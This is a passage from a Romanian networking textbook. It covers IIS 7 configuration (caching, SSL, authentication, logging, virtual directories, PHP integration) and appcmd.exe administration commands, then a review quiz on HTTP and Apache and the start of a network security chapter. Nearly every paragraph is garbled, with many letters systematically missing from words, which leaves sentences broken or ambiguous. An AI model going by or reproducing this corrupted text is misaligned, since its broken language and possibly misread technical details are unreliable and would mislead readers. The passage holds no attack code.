a tet HTTP î pagi a de ăspu s, e i lude e siu ea HTTP şi tipul o ţi utului. II“ u
defi eşte i pli it i iu fel de astfel de a tete. Totuşi, pe t u a u ite pagi i pot fi defi ite
a tete e o fi etu ate lie ţilo e i fo ează desp e sta ea pagi ii sp e e e plu, „Under
construction . La adăuga ea u ui a tet, se i t odu e u u e şi o aloa e e ep ezi tă alea
sp e o ţi utul a tetului.
 MIME Types1: Lista de e te sii î p eu ă u u o ţi ut o espu zăto e auzează II“-ului să
etu eze a ele fişie e d ept o ţi ut stati u su t i te p etate di a i . Lista up i de
fişie e ulti edia, i agini, documente, etc.
1
MIME = Multipurpose Internet Mail Extensions. Detalii la: http://en.wikipedia.org/wiki/MIME
344 | ‘ e ţ e l e L o a l e
 Modules: Modulele ep ezi tă efe ti ele e tele de od a e t atează e e ile e epţio ate de
se e . U odul î p eu ă u a ţiu ile pe a e le poate e e uta ep ezi tă u handler, iar un
handler î p eu ă u tipul de e e e ă uia i se apli ă ep ezi tă o aso ie e a sa u handler
mapping . Lista de odule dispo i ile ai i este ide ti ă u ea a esi ilă la edita ea sau
adăuga ea de i t ă i î Handler Mappings.
 Output Caching: Output Cache-ul ep ezi tă o zo ă di e o ia se e ului u de su t păst ate
esu sele a esate f e e t, pe t u a opti iza atât ti pul de ăspu s la o e e e ât şi el de
lo aliza e a u ei esu se. Este utilă folosi ea u ui astfel de cache î spe ial î situaţiile î a e
serverul depinde de programe secundare pentru procesare (CGI) sau pentru acces la
date/ esu se aze de date . Da ă e o ia dispo i ilă se e ului este p ea i ă, se a eli e a
memoria cache. Ce e ile o o ti ua apoi să fie păst ate şi î cache pe ăsu ă e su t
î depli ite. Adăuga ea u ei oi eguli de caching se face prin selectarea lui Add din panoul de
a ţiu i. O egulă de caching poate fi defi ită p i u ăto ii pa a et i:
o File name extension: E te sia fişie elo asup a ă o a se a apli a egula u e tă de caching.
o User-mode caching: Configu ează egula u e tă să sto heze o ţi utul cache-ului î spaţiul
utilizato . A tualiza ea i fo aţiilo di e o ia te po a ă poate fi fă ută î o e tul î a e II“
p i eşte o otifi a e de odifi a e a o ţi utului u ui fişie , egulat, la i te ale fixe de timp sau se
poate ea o egulă a e î piedi ă e pli it caching-ul u ui a u it tip de fişie . La setă ile a a sate
se poate o figu a a se e ul să sto heze î cache e siu i dife ite ale a eluiaşi fişie î fu ţie de
variabilelele sau antetele din cereri.
o Kernel-mode caching: Co figu ează egula u e tă să sto heze o ţi utul cache-ului î spaţiul
kernel. A a tajul o stă î faptul ă etu a ea o ţi utului stati di spaţiul kernel se face mai
apid de ât î azul spaţiului utilizato . Opţiu ile legate de a tualiza e i fo aţiilo di cache sunt
a eleaşi a şi la User-mode caching, ai puţi setă ile a a sate. Da ă se a ti ează atât User-mode
caching ât şi Kernel-mode caching şi se foloseşte a tualiza ea la i te ale egulate, u a eeaşi
valoare o figu ată î a ele situaţii, se a folosi auto at doa cache-ul din kernel.
9-11: Crearea unei reguli de caching

 SSL Settings: Pe ite odifi a ea e i ţelo ““L Secure Sockets Layer) pentru site-u i şi
apli aţii, î p eu ă u odul de t ata e a e tifi atelo sosite di pa tea lie ţilo . “e poate
spe ifi a folosi ea iptă ii pe sau de iţi.
 Authentication: Descrie metodele de autentificare folosite pentru accesul la un site. Se pot
folosi autentifi ă i di u ătoa ele atego ii: anonymous, ASP.NET impersonation, basic,
digest, forms şi Windows authentication. Doar în cazul în care serverul este membru al unui
do e iu este posi ilă folosi ea lui digest authentication.
 Logging: Pe ite lui II“ să înregistreze în jurnale cererile. Se poate alege calea în care vor fi
sto ate ju alele, tipu ile de i t ă i e o fi s ise î ele p e u şi odul şi f e e ţa u a e
se va realiza rotirea jurnalelor.
9.4.6 Securitate
9.4.6.1 Metode de autentificare

IIS pune la dispoziţie o se ie de etode p i a e utilizato ii se pot aute tifi a pe t u a
do â di a esul la o ţi utul site-urilor:
 Active Directory Client Certificate Authentication: “e foloseşte Active Directory Directory
Services1 pentru a verifica asocierea dintre utilizato i şi e tifi ate, fă ă alte date supli e ta e.
 Anonymous Authentication: Pe ite o i ă ui utilizato să a eseze î t egul o ţi ut pu li ,
fă ă a fu iza i fo aţii desp e ide titatea sa. Folosit î site-urile publice, de pe Internet.
 ASP.NET Impersonation: Pe ite ula ea apli aţiilo A“P.NET î t -un alt context decât cel al
contului implicit ASPNET. ASP.NET Impersonation poate fi folosit î o ju ţie u alte etode
de autentificare sau se poate crea un cont de utilizator pentru acest mod de autentificare.
 Basic Authentication: Utilizato ilo li se e e u u e şi o pa olă alide pe t u a fi aute tifi aţi.
Transmiterea datelor de autentificare se face slab securizat.
 Digest Authentication: Foloseşţe u Windows Domain Controller pentru a autentifica
utilizato ii, ep ezi tă o alte ati ă ai se u izată de ât Basic Authentication şi pote fi folosită
şi de ăt e utilizato ii di spatele firewall-urilor sau serverelor proxy. Ne esită HTTP . .
 Forms Authentication: A est od edi e tează utilizato i sp e o pagi ă sepa ată, î fo ula ul
ă eia îşi o i t odu e datele de aute tifi a e. După e a este i fo aţii su t alidate, ei o fi
edi e taţi î apoi la pagi a e ută i iţial. Deoa e e e Form Authentication t i ite i fo aţiile
necriptate se recomandă folosi ea ““L atât pe t u pagi a de aute tifi a e ât şi pe t u estul
i fo aţiilo de pe site.
 Windows Authentication: Foloseşte NTLM2 sau Kerberos3 pe t u aute tifi a e, i fo aţiile
i ulă ese u izate. Nu se e o a dă utiliza ea a estei etode de ât pentru intranet-uri, deci
u pe t u a aute tifi a utilizato i e se află î spatele u o firewall-uri sau proxy-uri.
După u s-a ai e ţio at a te io , pe t u a a esa esu sele lo ale î u a u o e e i

a o i e, II“ foloseşte d eptu ile u ui o t p op iu, IU“‘. P i o figu a ea setă ilo di ad ul
Anonymous Authentication, se poate specifica alt utilizator ce va fi folosit pentru cereri
anonime, dar acest lucru nu este recomandabil deoarece utilizatorii anonimi pot primi orice
drepturi de administrare pe care le-a putea a ea a el o t, eea e ep ezi tă u is de
securitate.
9.4.6.2 Exemplu de autentificare: Basic Authentication

Autentificarea prin metoda Basic Authentication ep ezi tă u sta da d ăspâ dit pe t u
autentificare pe baza unui nume de utilizato şi a u ei pa ole. Datele de o e ta e su t
1
http://www.windowsitlibrary.com/Content/716/06/toc.html
2
NT LAN Manager, protocol de autentificare proprietar Microsoft
3
http://en.wikipedia.org/wiki/Kerberos_(protocol)
346 | ‘ e ţ e l e L o a l e
t a s ise e iptate, astfel ă este e esa ă utiliza ea alto apa ilităţi de ipta e ale
se e ului e î o ju ţie u Basic Authentication pe t u a p oteja i fo aţiile. Pe t u a
putea folosi acest tip de aute tifi a e, fie a e utilizato t e uie să e efi ieze d eptul de a se
o e ta lo al, pe siste ul se e ului e . Pe t u a se uşu a ad i ist a ea î azul î a e
o tu ile î egist ate su t u e oase, utilizato ii pot fi adăugaţi u ui g up a e să le ofere
d eptu ile e esa e asup a fişie elo şi lo aţiilo pe a e a eştia t e uie să le a eseze.
Ca şi elelalte tipu i de aute tifi ă i, utiliza ea Basic Authentication e esită i stala ea
u ui odul opţio al al II“. I stala ea odulelo poate fi fă ută atât la i stala ea i iţială a
se e ului ât şi p i opţiu ea Add Role Services din Server Manager, sub grupul IIS. Basic
Authentication poate fi găsit su atego ia Security din lista de module disponibile.
9-12: Basic Authentication activ
După i stala ea Basic Authentication e e tual î p eu ă şi u alte etode de

aute tifi a e se e o a dă esta ta ea Server Manager. Pentru a configura metoda de
aute tifi a e la i el de site, se sele tează site-ul din categoria Sites, pa oul de o e iu i şi se
alege opţiu ea Authentication di lista afişată î odul Features View. Pentru a putea folosi
Basic Authentication, este necesar ca Anonymous Authentication să fie deza ti at. Î az
o t a , toţi utilizato ii or accesa site-ul în mod anonim, folosind Anonymous Authentication.
A ti a ea şi deza ti a ea etodelo de aute tifi a e se fa e di pa oul de a ţiu i.
La accesarea site-ului, browserele o afişa o fe east ă de i te oga e î a e o t e ui
completate un u e de utilizato şi o pa olă o fo u u o t î egist at pe siste ul pe
a e ulează se e ul.
9.4.6.3 SSL
Î od i pli it, o u i aţia di t e u lie t şi u se e e se fa e fă ă a se u iza
i fo aţiile t a s ise şi fă ă a se lua ăsu i î pot i a elo e ar putea intercepta aceste
date. Î o se i ţă, i fo aţiile o ţi ute î e e i şi ăspu su i pot fi i te eptate şi
i te p etate de u ata ato e poate as ulta o u i aţia la i elul eţelei. Pe i olul î a est
az o stă atât î i te epta ea fişie elo t a sfe ate î t e se e şi lie t ât şi î posi ilitatea
de a i te epta datele folosite la aute tifi ă i e u i ple e tează i t i se eo etodă de
securizare (ca în cazul Basic Authentication sau Forms Authetication, descrise pe scurt
a te io şi utiliza ea lo pe t u a i pe so a u utilizato auto izat şi a do â di a esul la
resurse securizate.
Pe t u a p e e i astfel de situaţii se poate folosi ““L Secure Sockets Layer) sau
protocoalele mai noi TLS (Transport Layer Security) pentru a securiza o u i aţia di t e se e
şi lie ţi. TL“ ep ezi tă u sta da d foa te ăspâ dit şi a eptat de ajo itatea browserelor
e . Pe t u si plitate, se a folosi î o ti ua e te e ul de ““L pe t u a efe i atât ““L ât şi

TLS.
Pe lâ gă se u iza ea o u i aţiei di t e se e şi lie ţi, ““L ajută şi la o fi a ea
ide tităţii u ui se e e pe t u u lie t. P o edeul este folosit la s a ă la gă pe t u a
asigu a lie tul de faptul ă se e ul este hia el a e se de la ă a fi şi u u ata ato . De
asemenea, ““L poate fi folosit de ăt e II“ pe t u a o fi a ide titatea u ui lie t, da ă
a esta p ezi tă u e tifi at a eptat.
Pe t u II“, o figu a ea ““L p esupu e două etape:
1. O ţi e ea u ui e tifi at de la o auto itate e u os ută Certificate Authority – CA). CA-ul
t e uie să fie e u os ut de toţi lie ţii a e se o e tează la u site e foloseşte u astfel de
certificat. Pentru site-uri intranet, CA-ul poate fi furnizat de un serviciu de certificate al Active
Directory (Active Directory Certificate Services1). Pentru site-uri din Internet, CA-ul este, de
egulă, e u os ut şi a eptat i pli it de toate browserele web. Pentru uz intern sau pentru
teste, II“ poate fu iza şi u e tifi at propriu, u ide titatea siste ului pe a e ulează.
2. Creare unei aso ie i î t e p oto olul HTTP“ şi po tul sau altul, după p efe i ţe şi
spe ifi a ea u ui e tifi at pe t u fie a e site pe t u a e se do eşte i ple e ta ea ““L.
Pentru a securiza un site prin SSL, folosind un certificat emis de propriul server, se
ur ează paşii:
1. Din ecranul de Features View al se e ului, se sele tează Server Certificates (fig. 9-13)
2. I pli it, lista de e tifi ate este goală. C ea ea u ui ou e tifi at p op iu se fa e p i alege ea
opţiu ii Create Self-Signed Certificate di pa oul de a ţiu i. Pe t u ea ea sa este e esa ă
doa defi i ea u ui u e. După ea e, e tifi atul apa e î listă î p eu ă u date legate de
fu izo ul său, data la a e e pi ă şi hash-ul său.
3. Din grupul Sites se selectează site-ul do it a fi se u izat ia di pa oul de a ţiu i se alege
Bindings. Se adaugă o ouă aso ie e, î t e p oto olul HTTP“ şi po tul folosit pe t u a esta
i pli it şi, e e tual, i te faţa pe a e să ăspu dă e e ilo . Opţio al, se poate eli ina
binding-ul HTTP, care oricum va returna de acum înainte o eroare de tip 403.4 (Forbidden) la
încercarea de a accesa site-ul prin HTTP simplu.
9-13: Managementul certificatelor la nivel de server
1
Active Directory Certificate Services este disponibil ca rol pentru Windows Server 2008 şi poate fi
instalat din Server Manager, i te faţa Add Roles.
348 | ‘ e ţ e l e L o a l e
9-14: A esarea setărilor ““L
4. Tot în cadrul site-ului sele tat a te io , se a esează di Features View opţiu ea SSL Settings
(fig. 9-14).
5. Opţiu ile e ţi de ““L pe it utiliza ea iptă ii pe de iţi sau pe de iţi. De ase e ea,
de ai i poate fi o figu at şi o po ta e tul se e ului î azul î a e lie ţii fu izează
e tifi ate pe t u p op ia lo ide titate: poate fi setat să le ig o e, să le a epte da ă su t
fu izate sau să a epte doa lie ţii a e p ezi tă u e tifi at alid. Î azul î a e se
spe ifi ă faptul ă doa lie ţii u e tifi ate alide au a es, a eştia o t e ui să ai ă i stalat
în browserul propriu certificatul respectiv.
6. “e sele tează Apply di pa oul de a ţiu i şi se e ifi ă oua o figu aţie. Ate ţie, a esa ea
site-ului se fa e a u p i p oto olul HTTP“, de i ad esa t e uie să fie p e edată de a esta.
O soluţie pe t u e ita ea e esităţii de a i lude p oto olul HTTP“ î ad esa site-ului, când
a esta este a esat de ăt e lie ţi, este defi i ea a două site-uri, primul cu binding pentru
HTTP, pe portul 80, iar al doilea cu binding doa pe t u HTTP“ şi po tul . Apoi, se poate
folosi facilitatea de HTTP Redirect1 din Features View pentru primul site pentru a redirecta
toate cererile spre site-ul se u izat. Ate ţie, î a est az, u t e uie defi ită a eeaşi ădă i ă
pentru ambele site-u i, altfel se a o ţi e o edi e ta e i fi ită sp e a elaşi site.
Ca şi î azul adăugă ii alto odule, după i stala ea HTTP Redirect poate fi e esa ă
repornirea Server Manager-ului pe t u a opţiu ea să fie dispo i ilă la i el de se e şi site.
9.4.7 Crearea şi întreţinerea jurnalelor

Pagina de Logging a esi ilă di odul Features View permite configurarea modului în
a e e e i e sosite su t î egist ate î ju ale, la i el de site sau pe t u î t egul se e , da ă
se o figu ează la i el de se e . “etă ile pe it spe ifi a ea fo atului fişie ului ju al, a
di e to ului î a e a esta a fi sto at şi odul î a e se ealizează oti ea ju alelo .
1
HTTP Redirect este diponibil sub forma unei compo e te opţio ale II“, dispo i ilă la i stala e sau p i
i te faţa Add ‘ole “e i es di “e e Ma age , su II“.
9-15: Configurarea jurnalelor
Fo atul i pli it al fişie ului este W C, u fo at de tip A“CII, î a e se pot alege

câmpurile ce vor fi înregistrate. Datele su t sepa ate p i spaţii ia ti pul este î egist at î
format UTC (Coordinated Universal Time).
Da ă se alege a se e ul să e ţi ă u si gu ju al la i el de se e , se poate sele ta
formatul Binary, în care vor fi stocate cererile tuturor site-urilo . A est od o se ă î ae
ăsu ă esu sele de e o ie şi p o eso şi este e o a da il a fi folosit î edii u t afi
i te s şi î ă a e a e a se e elo . Citi ea u ui astfel de ju al poate fi fă ută u u utilita
ca Log Parser1.
Da ă se o figu ează ge e a ea u ui ju al pe t u fie a e site î egist at î se e se
poate alege, de ase e ea, fo atul W C, a şi ai sus, p e u şi fo atul II“ eează u
ju al spe ifi pe t u II“, de tip A“CII, î a e â pu ile u su t o figu a ile şi fo atul
NC“A sta da d, de ase e ea A“CII, da u ai puţi e i fo aţii de ât W C, de ase e ea,
neconfigurabile).
Deza ti a ea şi a ti a ea se i iului de ju aliza e a II“ pot fi fă ute di pa oul de a ţiu i şi
au efect imediat.
9.4.8 Crearea de directoare virtuale

Î u ele azu i se do eşte i lude ea î t -u site a u ui o ţi ut e u este sto at pe
server, într-un director local. Site-u ile pot i lude di e toa e i tuale, e ep ezi tă ăi sp e
directoare reale. Un director adresat de un director virtual poate fi unul local sau unul stocat
pe u alt se e , pe t u a e ita ealiza ea u ei opii a a elui o ţi ut pe t u aşi a lo ală.
U di e to i tual poate o ţi e do u e te sau i fo aţii supli e ta e pe t u u site
sau hia u alt site de si e stătăto . “p e e e plu, da ă site-ul o pa iei A do eşte să
1
http://go.microsoft.com/fwlink/?LinkId=59279
350 | ‘ e ţ e l e L o a l e
găzduias ă te po a site-ul o pa iei X, poate ea u di e to i tual pe t u a o ţi e site-

ul lui X. În acest caz, compania X ar putea avea site-ul găzduit la ad esa
www.companiaA.com/companiaX.
Pentru a crea u di e to i tual, se u ează paşii:
1. Având un site selectat în panoul de conexiuni sub grupul Sites, se face clic pe View Virtual
Directories î pa oul de a ţiu i. Este afişată pagi a e e u e ă di e toa ele i tuale
configurate pentru site-ul curent.
2. Pentru a configura un nou director virtual, se face clic pe Add Virtual Directory din panoul de
a ţiu i şi este afişată fe east a di figu a 9-16:
9-16: Crearea unui nou director virtual
3. “e i t odu e u alias pe t u di e to ul i tual a e a pe ite a esa ea o ţi utului p i

adresa <adresă_site>/alias şi se spe ifi ă şi alea sp e lo aţia u de su t sto ate fişie ele,
e poate fi lo ală sau a esi ilă p i eţea.
4. Autentificarea impli ită este de tip pass-through, de i se a î e a a esa ea lo aţiei folosi d
identitatea utilizatorului ce emite cererea sau a utilizatorului IUSR în cazul cererilor anonime.
Da ă se do eşte, se poate spe ifi a u a u it o t de utilizato pe aza ă uia se va accesa
o ţi utul di e to ului i tual p i t -un clic pe butonul Connect as.
5. “e alidează o figu aţia de ai sus ia oul di e to eat apa e î lista di e toa elo i tuale.
Pe t u a odifi a p op ietăţile u ui di e to eat, se sele tează şi se alege Basic settings din
lista de a ţiu i.
U eo i este de do it o figu a ea a uală a pe isiu ilo asup a o ţi utului
directoarelor virtuale. Pentru aceasta se poate selecta Edit permissions di pa oul de a ţiu i
a e afişează, de fapt, i te faţa de p op ietăţi a di e to ului î fo a a esi ilă şi di Wi do s
Explorer.
9.4.9 Aplicaţie: )ntegrarea ))S 7 şi P(P

Pe t u a putea pe ite lui II“ să i te p eteze od PHP e istă ai ulte etode. Paşii
u ăto i ep ezi tă o a ia tă fa ilă de a ealiza a est lu u pe t u e e plul de faţă se
o side ă ă i stala ea de Wi do s s-a fă ut î C:\Windows:
1. Di lista de odule opţio ale II“ se sele tează ISAPI Extensions şi se i stalează fie la i stala ea
i iţială a II“, fie ulte io , di Server Manager, de la Add Role Services, sub rolul de server web.
2. “e des a ă PHP de la http://www.php.net/downloads.php şi se deza hi ează î t -un
director la alegere. Pentru exemplu, fie acesta C:\php.
3. “e opiază fişie ul php.ini-dist din C:\php în C:\Windows şi se ede u eşte î php.ini.
4. Se deschide C:\Windows\php.ini într-u edito de te te, se lo alizează li ia

;extension=php_mysql.dll şi se de o e tează li ia se şte ge pu tul şi i gula de la
î eput . “e sal ează şi se î hide fişie ul.
5. “e opiază fişie ul C:\php\ext\php_mysql.dll în C:\Windows\System32.
6. Se deschide IIS Manager şi, la i el de site, se a esează Handler Mappings.
7. Se alege Add Script Map di e iul de a ţiu i.
9-17: Add Script Map
8. “e o pletează â pu ile di fe east a Add Script Map după u u ează:

o Request path i di ă tipul e e ilo , de i fişie ele de tip .php
o Executable ep ezi tă alea sp e i liote a DLL-ul e a i te p eta a este fişie e.
o În câmpul Name se i t odu e u u e pe t u a ide tifi a a eastă aso ie e.
9. “e apasă OK, ia î fe east a u ătoa e Yes.
În acest moment, IIS este capabil de a interpreta pagini PHP. Pentru a test acest lucru, se
poate ea u fişie .php într-un director al site-ului o figu at ai sus, a â d o ţi utul
<?php phpinfo(); ?> şi accesându-l.
De ase e ea, se a o se a faptul ă se p i eşte o e oa e sau se listează o ţi utul
di e to ului, î fu ţie de opţiu ea de la Directory Browsing î azul î a e se î ea ă
a esa ea u ei lo aţii e o ti e u fişie index.php deoarece II“ u a fost setat să
e u oas ă fişie ele i de u e te sia .php. Pe t u a easta, î se ţiu ea Default Document,
tot în cadrul site-ului sele tat ai sus, se adaugă şi i t a ea pe t u index.php.
9.5 IIS 7 – Configurări în linie de comandă

IIS 7 include un nou utilitar, appcmd.exe, un executabil ce poate fi folosit pentru
ad i ist a ea o i ă o fu ţii ale II“. P i appcmd.exe se pot ea şi o figu a site-uri,
application pool-u i, di e toa e i tuale, se poate o t ola odul î a e a estea ulează, se
poate e a i a fu ţio a ea se i iului e şi, de ase e ea, se pot edita o figu aţiile II“.
appcmd.exe i ple e tează o si ta ă u ita ă şi logi ă. Ope aţiile şi a ţiu ile se apli ă pe o
zo ă spe ifi ă II“ sau asup a u ui o ie t. “p e e e plu se pot lista site-urile (comanda fiind
listarea iar obiectul fiind site-u ile , se pot adăuga apli aţii, se pot î hide p o ese sau se pot
seta dife ite o figu aţii.
352 | ‘ e ţ e l e L o a l e
Ate ţie, appcmd.exe este situat la %systemroot%\system32\inetsrv\ ia a eastă ale

u este i lusă i pli it în variabila de mediu %path%, de i apela ea lui t e uie fă ută fie
i t odu â d î t eaga ale î ai tea e e uta ilului, fie p i adăuga ea ăii sale la o ţi utul
variabilei de mediu %path%. Pentru a modifica variabila de mediu %path% se poate folosi
u ătoa ea o a dă î cmd.exe:
set path=%path%;%windir%\system32\inetsrv
Sintaxa comenzilor appcmd.exe este de tipul:

appcmd (comandă) (obiect) (identificator)
Listarea site-u ilo di li ie de o a dă se poate fa e p i o a da:
appcmd list sites
Comanda de mai sus pe ite spe ifi a ea u elui u ui a u it site, p e u şi filt a ea

site-u ilo a ti e sau i a ti e p i adăuga ea pa a et ului /state:started sau
/state:stopped.
“e poate fa e adăuga ea u ui î t eg ou site di li ia de o a dă. “p e e e plu,
u ătoa ea o a dă adaugă u site de u it „Bi liote a e fu ţio ează pe po tul , al
ă ui ădă i ă este situată la C:\inetpub\wwwroot\biblioteca\:
PS C:\> appcmd add site /name:Biblioteca /id:2 /bindings:"http/*:8080:" /physicalPath:
"C:\inetpub\wwwroot\biblioteca"
SITE object "Biblioteca" added
APP object "Biblioteca/" added
VDIR object "Biblioteca/" added
Şte ge ea u ui site defi it î p eala il se fa e p i o a da delete, folosindu-se numele

său d ept ide tifi ato :
appcmd delete site “Biblioteca”
IIS permite izualiza ea stă ii se e ului, a easta i luzâ d p o esele a ti e, p e u şi

e e ile pe a e a estea le p o esează. “ta ea application pool-urilor care sunt pornite sau
op ite poate fi o ţi ută p i u ătoa ele o e zi:
appcmd list apppools
appcmd list apppools /state:started
appcmd list apppools /state:stopped
Pentru a vizualiza lista proceselor curente, starea unui anumit proces sau lista proceselor
asociate unui application pool, se pot folosi o e zile u ătoa e:
appcmd list wps
appcmd list wp „2244”
appcmd list wps /apppool.name:DefaultAppPool
Pot fi afişate î ti p eal e e ile î u s de e e uţie di se e . Ce e ile pot fi filt ate î

fu ţie de p o es, application pool sau numele site-ului:
appcmd list requests
appcmd list requests /wp.name:2244
appcmd list requests /apppool.name:”DefaultAppPool”
appcmd list requests /site.name:”Biblioteca”
Modifi a ea pa a et ilo u ui site e iste t se fa e ase ă ăto o e zilo de izualiza e,

aî o a da u ătoa e, p i a ţiu ea „set , a e odifi ă i de ul site-ului „Bi liote a la
99:
appcmd set site “Biblioteca” /id:99
Î ge e al, pe t u odifi a ea o figu aţiei, se spe ifi ă se ţiu ea sau U‘L-ul, urmat de
pa a et ul de odifi at î p eu ă u oua sa aloa e. P i u ătoa ele două o e zi se
setează pa ametrul Enabled pe t u se ţiu ea defaultDocument la valoarea true pentru
întregul server sau pentru un anumit URL din cadrul unui site:
appcmd set config /section:defaultDocument /enabled:true

appcmd set config “Biblioteca/www/files/” /section:defaultDocument /enabled:true
“al a ea o figu aţiei se e ului poate fi ealizată p i t -o si plă o a dă de o li ie:

appcmd add backup “nume_backup”
Da ă u backup u a elaşi u e e istă deja, se a etu a o e oa e. Da a se do eşte

refolosirea acelui nume pentru un nou backup, trebuie eliminat cel vechi înainte de a fi creat
cel nou:
appcmd delete backup “nume_backup”
Posibilitatea de a restaura un backup p e ede t este la fel de i po ta tă a şi ea ea

u uia. Pe t u afişa ea u ei liste a backup-u ilo e iste te şi restaurarea unuia dintre ele se
folosesc comenzile:
appcmd list backup
appcmd restore backup “nume_backup”
Î ge e al, î li ia de o a dă, â d se spe ifi ă u U‘L asup a ă uia se o efe tua

odifi ă i, e istă opţiu ea de a-l descrie prin calea sa completă, sp e e e plu:
http://localhost/Biblioteca/www poate ep eze ta faptul ă se efe tuează odifi ă i
asupra directorului www al di e to ului i tual „Bi liote a . De asemenea, se poate specifica o
ale elati ă la u ele u ui a u it site, a Biblioteca/main/www, eea e se efe ă la
directorul main/www/ di ad ul u ui site de u it „Bi liote a .
354 | ‘ e ţ e l e L o a l e
Î tre ări
1. “iste ul WWW se azează pe u odel lie t/se e , odul de o u i a e î t e
lie t şi se e fii d defi it de p oto olul HTTP. Cu a ată e e ea ge e ată de
browser-ul d s. atu i â d î e aţi să a esaţi www.test.com/file.html?
 GET www.test.com/file.html HTTP
 GIVE www.test.com/file.html HTTP/1.0
 GET www.test.com/file.html HTTP/1.0
 GET /file.html HTTP/1.0
2. Ce avantaje ofe ă găzdui ea i tuală azată pe u e? două a ia te

 Mai multe site-u i e pot fi gestio ate de a elaşi se e
 Este e esa ă doa o si gu ă ad esă IP
 Toate browser-ele e supo tă a est tip de găzdui e i tuală
 Este e esa ă doa o si gu ă pla ă de eţea, u ai ulte ad ese IP asociate
3. Ce o a dă u poate fi folosită pe t u op i ea serverului Apache?

 /etc/init.d/apache stop
 a2dissite
 apache2ctl stop
 apache2 –k stop
4. Care este utilizatorul folosit de Apache pentru accesarea unei resurse din sistemul
lo al de fişie e?
 root
 www-user
 www-data
 nobody
5. Care modul este folosit pentru a asigura folosirea protocolului HTTPS?

 mod_cgi
 mod_userdir
 mod_ssl
 mod_dir
6. Ca e su t po tu ile utilizate i pli it de p oto oalele HTTP, espe ti HTT“? alegeţi

două ăspu su i
 80
 143
 443
 8080
7. Este posi il a u se e Apa he u supo t T“L/““L să as ulte o e iu i HTTP“ pe

po tul şi o e iu i HTTP pe po tul ?
 da
 nu
 da, dar numai prin folosirea modulului mod_cgi
 da, dar numai prin folosirea modulului mod_auth
10 Securitatea reţelei
Being able to break security doesn't make you a hacker anymore than being able to hotwire
cars makes you an automotive engineer."
Eric Raymond

 P i ipii de ază ale se u ităţii
 Tipu i de ata u i de eţea
 Exploatarea ul e a ilităţilo eţelei
Cine este...
Kevin Mitnick este u ul di te ei ai u os uţi ha ke i di a ii - . El a euşit sa
spa gă eţeaua DEC pe t u a edea odul su să de la VM“ şi a i t at î siste e Moto ola,
NEC, Nokia, “u şi Fujitsu “ie e s. Ke i Mit i k a de e it u os ut p i faptul ă a fost
p i ul ha ke al ă ui p o es a fost ediatizat pe s a ă la gă. El a e u os ut ă a păt u s
î di e se eţele folosi du-se în principal de "so ial e gi ee i g" şi a fost o damnat la 5
ani de închisoa e. După eli e a e î şi-a eat p op ia fi ă de o sulta ţă î
domeniul se u ităţii. A s is două ă ţi: The A t of De eptio şi The A t of I t usio .
Gordon Lyon u os ut şi su pseudo i ul de F odo Vasko i h este u e pe t î
se u itate şi, aşa u îşi spu e, "tipul u de ha ke ". El este auto ul u os utului p og a
de s a a e ap. L o a a ut u ol a ti î o u itatea de se u itate a eţelelo î ă di
anii 90. Pseudonimul lui, Fyodor, a fost luat de la celebrul autor rus Fyodor Dostoyevsky.
De-a lu gul ulti ilo a i, ulte te e teh i e spe ifi e do e iului se u ităţii au pă ăsit
do e iul IT, fii d p eluate de zia e, ju ale TV, sau hia de i dust ia i e atog afi ă. Di
pă ate, p o esul u a u ă it, el ai adesea, adu e ea î sfe a pu li ă a o eptelo de
se u itate, i spe ula ea se zaţio alului p i ig o a ea o st â ge ilo lu ii eale, du â d la
promovarea unor noi mituri ale erei IT.
Î ziua de astăzi, deja se o side ă o ale „pe fo a ţele ha ke ilo di fil ele
americane, a e euşes să o p o ită se u itatea u ui siste î âte a se u de. E istă
oa e i a e ed ă este posi il să s ii i uşi pe t u siste e de ope a e e t ate est e ezi
„)iua I depe de ţei , .
Pentru cei e au des his a est apitol î spe a ţa o ţi e ii u ei pute i e ă gi ite î
controlul tutu o siste elo ele t o i e u ează o deza ăgi e: paginile e u ează u
euşes de ât să adu ă u pi de o di e î do e iul populat de itu i al se u ităţii IT.
10.1 Riscuri de securitate

10.1.1 Principii de bază
O p i ă clasificare a riscurilor de securitate distinge trei tipuri de atacuri: atacuri venite
di I te et u o ată de su es edusă , ata u i i iţiate di eţeaua lo ală şi ata u i ge e ate
de pe a eeaşi aşi ă - a estea di u ă a â d u i pa t ult ai î se nat decât primele.
Deşi u g adul de is el ai idi at, ata u ile i iţiate de utilizato ii se e ului ţi tă su t
deseo i t atate î g a ă şi u ita . În continuare vor fi discutate ul e a ilităţile importante ce
pot înlesni un astfel de atac. fiecare di t e a estea putâ d du e la o p o ite ea se u ităţii
sistemului.
356 | ‘ e ţ e l e L o a l e
P i ipiul fu da e tal al se u ităţii, fie ea IT sau de o i e altă atu ă, este:

“e u itatea u ui siste este egală u se u itatea elei ai sla e e igi.
Altfel spus, degea a îţi pui uşă ultra-pe fo a tă da ă u o î hizi u heia, sau, apli at î
do e iul IT: u a e ost să heltui su e e o e de a i pe siste e de se u itate, da ă
utilizato ii foloses d ept pa ole p op iul u e sau îşi ţi pa ola lipită pe o ito .
P i ită di pe spe ti a u ui siste IT, o soluţie de se u itate t e uie să i ludă atât o
politi ă de se u itate, e defi eşte d eptu ile şi espo sa ilităţile utilizato ilo , ât şi
spe ifi aţii pe t u asigu a ea se u ităţii fizi e, a o po e telo siste ului de ope a e, a
apli aţiilo lo ale, p e u şi a se i iilo de eţea.
O politi ă de se uritate t e uie să sta ileas ă u o p o is î t e g adul de fle i ilitate al
se i iilo IT şi i elul de se u itate do it. Luate ad literam, e i ţele de se u itate a
presupune izola ea totală a siste ului de lu ea e te ioa ă, da , u o astfel de a o da e
du e la li ita ea fu ţio alităţii, el ai adesea se u itatea u ui siste este defi ită a u set
de etode de p ote ţie e ite să des u ajeze şi să î tâ zie ata ato ul.
10.1.2 Tipuri de atacuri de reţea

Cea ai î tâl ită lasifi a e a ata u ilo ele t o i e u ă eşte sti a de p oto oale O“I,
î e â d să g upeze ata u ile î fu ţie de tipul de ul e a ilitate e ploatat.
10.1.2.1 Atacurile de nivel fizic

Atacurile de nivel 1 (fizic) ep ezi tă u u ă foa te i di totalul ata u ilo pe t u ă
p esupu a es la ediul de t a s isie. Î a eastă atego ie su t i luse ata u ile e
p esupu i te epta ea t afi ului di eţea. Metodele de p ote ţie dife ă î fu ţie de ediul
de transmisie folosit.
Î eţelele fă ă fi , ediul fii d atât pa tajat ât şi foa te a esi il, p ote ţia se azează
ai ales pe ipta ea t afi ului. “e u iza ea u ei astfel de eţele po eşte de la egla ea pute ii
de e isie a e hipa e telo fă ă fi e hipa e tele ai iefti e de obicei nu permit astfel de
